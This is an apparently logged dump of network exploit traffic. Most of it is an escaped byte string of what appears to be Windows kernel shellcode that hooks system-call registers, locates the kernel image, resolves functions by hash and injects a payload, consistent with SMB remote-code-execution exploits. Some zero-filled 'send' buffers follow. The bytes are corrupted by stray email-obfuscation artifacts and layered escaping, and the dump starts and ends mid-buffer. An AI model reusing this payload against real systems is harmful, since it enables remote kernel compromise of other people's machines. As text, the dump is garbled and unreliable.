\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 17, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\